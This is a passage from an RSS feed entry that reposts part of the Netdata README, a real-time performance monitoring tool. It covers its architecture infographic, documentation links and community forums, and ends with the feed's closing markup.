<p dir="auto"><a href="https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-231219" src="https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e.png" sizes="auto, (max-width: 1852px) 100vw, 1852px" srcset="https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e.png 1852w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-460x267.png 460w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-1024x595.png 1024w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-768x446.png 768w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-1536x892.png 1536w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-500x290.png 500w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-200x116.png 200w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-378x220.png 378w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-565x328.png 565w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-120x70.png 120w, https://hakin9.org/wp-content/uploads/2020/02/95367248-5f755980-0889-11eb-827f-9b7aa02a556e-310x180.png 310w" alt="" width="1852" height="1076" /></a></p>
<p dir="auto">The result is a highly efficient, low-latency system, supporting multiple readers and one writer on each metric.</p>
<h2 dir="auto"><a id="user-content-infographic" class="anchor" href="https://github.com/netdata/netdata/stargazers#infographic" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Infographic</strong></h2>
<p dir="auto">This is a high-level overview of Netdata features and architecture. Click on it to view an interactive version, which has links to our documentation.</p>
<p dir="auto"><a href="https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-231220" src="https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc.png" sizes="auto, (max-width: 1219px) 100vw, 1219px" srcset="https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc.png 1219w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-460x795.png 460w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-592x1024.png 592w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-768x1328.png 768w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-888x1536.png 888w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-1184x2048.png 1184w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-500x865.png 500w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-116x200.png 116w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-378x654.png 378w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-565x977.png 565w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-69x120.png 69w, https://hakin9.org/wp-content/uploads/2020/02/60951037-8ba5d180-a2f8-11e9-906e-e27356f168bc-310x536.png 310w" alt="" width="1219" height="2108" /></a></p>
<h2 dir="auto"><strong>Documentation</strong></h2>
<p dir="auto">Netdata&#8217;s documentation is available at <a href="https://learn.netdata.cloud/" target="_blank" rel="nofollow noopener"><strong>Netdata Learn</strong></a>.</p>
<p dir="auto">This site also hosts a number of <a href="https://learn.netdata.cloud/guides" target="_blank" rel="nofollow noopener">guides</a> to help newer users better understand how to collect metrics, troubleshoot via charts, export to external databases, and more.</p>
<h2 dir="auto"><a id="user-content-community" class="anchor" href="https://github.com/netdata/netdata/stargazers#community" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Community</strong></h2>
<p dir="auto">Netdata is an inclusive open-source project and community. Please read the <a href="https://learn.netdata.cloud/contribute/code-of-conduct" target="_blank" rel="nofollow noopener">Code of Conduct</a>.</p>
<p dir="auto">Find most of the Netdata team in our <a href="https://community.netdata.cloud/" target="_blank" rel="nofollow noopener">community forums</a>. It&#8217;s the best place to ask questions, find resources, and engage with passionate professionals.</p>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/netdata-real-time-performance-monitoring/">Netdata &#8211; Real-time Performance Monitoring</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/netdata-real-time-performance-monitoring/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
